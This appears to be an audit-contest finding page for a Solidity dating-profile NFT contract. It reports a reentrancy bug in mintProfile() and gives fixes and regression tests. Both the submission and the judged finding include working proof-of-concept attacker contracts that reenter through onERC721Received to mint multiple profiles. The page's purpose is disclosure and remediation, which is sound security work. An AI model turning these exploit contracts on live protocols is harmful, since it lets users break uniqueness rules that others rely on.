DatingDapp

AI First Flight #6
Beginner Friendly, Foundry, Solidity, NFT
Submission Details
Severity: medium
Valid

Reentrancy in `mintProfile()` bypasses the one-profile-per-user limit

Severity

Medium

Likelihood

High

Root + Impact

mintProfile() records profileToToken[msg.sender] after _safeMint(), allowing reentrancy to mint multiple profiles before the one-profile limit is enforced.

Description

  • The intended behavior is that each address can mint only one dating profile NFT.

  • The issue is that _safeMint() is executed before profileToToken[msg.sender] is updated. If the recipient is a contract, it can reenter through onERC721Received() while the mapping still shows no existing profile, allowing repeated mints in the same transaction.

```solidity
function mintProfile(string memory name, uint8 age, string memory profileImage) external {
    require(profileToToken[msg.sender] == 0, "Profile already exists");
    uint256 tokenId = ++_nextTokenId;
@>  _safeMint(msg.sender, tokenId);
    _profiles[tokenId] = Profile(name, age, profileImage);
@>  profileToToken[msg.sender] = tokenId;
    emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);
}
```

Risk

Likelihood: High

  • A contract recipient can reliably trigger the reentrancy through onERC721Received().

  • No unusual conditions are required beyond minting through a contract.

Impact: Medium

  • One address can mint multiple profile NFTs.

  • This breaks the protocol’s core uniqueness rule for user profiles.

Proof of Concept

The following test shows that a contract can reenter during _safeMint() and mint multiple profiles for the same address.

```solidity
contract ReentrancyAttack is IERC721Receiver {
    string public name = "Jorx";
    string public profileImage;
    uint8 public age = 30;
    address public soulBoundNFT;

    constructor(address _soulBoundNFT) {
        soulBoundNFT = _soulBoundNFT;
    }

    function attackMint() external {
        // Start the first mint. The reentrancy happens during the receiver hook.
        ISoulBound(soulBoundNFT).mintProfile(name, age, profileImage);
    }

    function onERC721Received(
        address,
        address,
        uint256,
        bytes calldata
    ) external returns (bytes4) {
        // Reenter before profileToToken[msg.sender] is updated.
        // This keeps passing the "Profile already exists" check.
        if (ISoulBound(soulBoundNFT).balanceOf(address(this)) < 5) {
            ISoulBound(soulBoundNFT).mintProfile(name, age, profileImage);
        }
        return IERC721Receiver.onERC721Received.selector;
    }
}

function test_Reentrancy_AllowsMultipleProfilesPerUser() public {
    // Deploy the attacker contract so it can receive ERC721 tokens
    // and reenter through onERC721Received().
    ReentrancyAttack attacker = new ReentrancyAttack(address(soulboundNFT));
    // Trigger the first mint, which recursively mints additional profiles.
    attacker.attackMint();
    // The same address ends up holding multiple profile NFTs.
    assertEq(soulboundNFT.balanceOf(address(attacker)), 5);
}
```

Recommended Mitigation

Record the user’s profile token before calling _safeMint() so the one-profile limit is consumed before the receiver hook can execute.

function mintProfile(string memory name, uint8 age, string memory profileImage) external {
require(profileToToken[msg.sender] == 0, "Profile already exists");
uint256 tokenId = ++_nextTokenId;
+ profileToToken[msg.sender] = tokenId;
_safeMint(msg.sender, tokenId);
_profiles[tokenId] = Profile(name, age, profileImage);
- profileToToken[msg.sender] = tokenId;
emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);
}
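
Review bot: `_profiles[tokenId] = Profile(name, age, profileImage);` still runs after `_safeMint(msg.sender, tokenId);`, so the receiver hook executes while the new token has no stored profile data, and anything reached from `onERC721Received()` that reads the profile for this token sees empty fields. Moving the `_profiles[tokenId]` write up next to the added `profileToToken[msg.sender] = tokenId;` line completes the checks-effects-interactions ordering and leaves only `emit ProfileMinted(...)` after the external call.
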
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-04] Reentrancy in `SoulboundProfileNft::mintProfile` allows minting multiple NFTs per address, which disrupts protocol expectations

## Description

In `mintProfile`, the internal `_safeMint` function is called before updating the contract state (`_profiles[tokenId]` and `profileToToken[msg.sender]`). This violates CEI, as `_safeMint` calls an internal function that could invoke an external contract if `msg.sender` is a contract with a malicious `onERC721Received` implementation.

Source Code:

```solidity
function mintProfile(string memory name, uint8 age, string memory profileImage) external {
    require(profileToToken[msg.sender] == 0, "Profile already exists");
    uint256 tokenId = ++_nextTokenId;
    _safeMint(msg.sender, tokenId);

    // Store metadata on-chain
    _profiles[tokenId] = Profile(name, age, profileImage);
    profileToToken[msg.sender] = tokenId;

    emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);
}
```

## Vulnerability Details

Copy this test and auxiliary contract in the unit test suite to prove that an attacker can mint multiple NFTs:

```solidity
function testReentrancyMultipleNft() public {
    MaliciousContract maliciousContract = new MaliciousContract(
        address(soulboundNFT)
    );
    vm.prank(address(maliciousContract));
    MaliciousContract(maliciousContract).attack();
    assertEq(soulboundNFT.balanceOf(address(maliciousContract)), 2);
    assertEq(soulboundNFT.profileToToken(address(maliciousContract)), 1);
}
```

```solidity
contract MaliciousContract {
    SoulboundProfileNFT soulboundNFT;
    uint256 counter;

    constructor(address _soulboundNFT) {
        soulboundNFT = SoulboundProfileNFT(_soulboundNFT);
    }

    // Malicious reentrancy attack
    function attack() external {
        soulboundNFT.mintProfile("Evil", 99, "malicious.png");
    }

    // Malicious onERC721Received function
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4) {
        // Reenter the mintProfile function
        if (counter == 0) {
            counter++;
            soulboundNFT.mintProfile("EvilAgain", 100, "malicious2.png");
        }
        return 0x150b7a02;
    }
}
```

## Impact

The attacker could end up having multiple NFTs, but only one profile. This is because the `mintProfile` function resets the `profileToToken` mapping each time. At the end, the attacker will have only one profile connecting with one token ID with the information of the first mint. I consider that the severity is Low because the `LikeRegistry` contract works with the token IDs, not the NFTs. So, the impact will be a disruption in the relation of the amount of NFTs and the amount of profiles.

## Recommendations

To follow CEI properly, move `_safeMint` to the end:

```diff
function mintProfile(string memory name, uint8 age, string memory profileImage) external {
    require(profileToToken[msg.sender] == 0, "Profile already exists");
    uint256 tokenId = ++_nextTokenId;
-   _safeMint(msg.sender, tokenId);

    // Store metadata on-chain
    _profiles[tokenId] = Profile(name, age, profileImage);
    profileToToken[msg.sender] = tokenId;

+   _safeMint(msg.sender, tokenId);
    emit ProfileMinted(msg.sender, tokenId, name, age, profileImage);
}
```
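
Regression tests that pin either reordering fix shown on this page, as an added example that is not part of the submission or the judged finding. They assume they sit in the same Foundry test file as the submission's PoC, reusing its `ReentrancyAttack` contract and `soulboundNFT` instance with `IERC721Receiver` already imported; `HonestReceiver` and the sample strings are constructed here.

```solidity
// Hypothetical fixture (not in the project): a well-behaved contract wallet
// that accepts ERC-721 tokens and never calls back into the NFT contract.
contract HonestReceiver is IERC721Receiver {
    function onERC721Received(address, address, uint256, bytes calldata)
        external
        pure
        returns (bytes4)
    {
        return IERC721Receiver.onERC721Received.selector;
    }
}

// Add both tests to the Foundry test contract that holds the PoC.
function test_FixedMint_RevertsOnReentrantMint() public {
    ReentrancyAttack attacker = new ReentrancyAttack(address(soulboundNFT));

    // With the mapping written before _safeMint(), the nested mintProfile()
    // fails the require. The revert reason propagates back out through the
    // receiver hook and _safeMint(), so the outer mint is undone as well.
    vm.expectRevert("Profile already exists");
    attacker.attackMint();

    // Nothing from the reverted transaction may persist.
    assertEq(soulboundNFT.balanceOf(address(attacker)), 0);
    assertEq(soulboundNFT.profileToToken(address(attacker)), 0);
}

function test_FixedMint_ContractWalletStillLimitedToOne() public {
    HonestReceiver wallet = new HonestReceiver();

    // The fix must not break minting to contracts that accept the token.
    vm.prank(address(wallet));
    soulboundNFT.mintProfile("Alice", 30, "ipfs://constructed-sample");
    assertEq(soulboundNFT.balanceOf(address(wallet)), 1);

    // The mapping and token ownership agree on the single profile.
    uint256 tokenId = soulboundNFT.profileToToken(address(wallet));
    assertEq(soulboundNFT.ownerOf(tokenId), address(wallet));

    // A second, sequential mint from the same address is rejected.
    vm.prank(address(wallet));
    vm.expectRevert("Profile already exists");
    soulboundNFT.mintProfile("Alice", 30, "ipfs://constructed-sample");
}
```

Against the unpatched contract the first test fails, because `attackMint()` completes and leaves five tokens on the attacker address instead of reverting.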
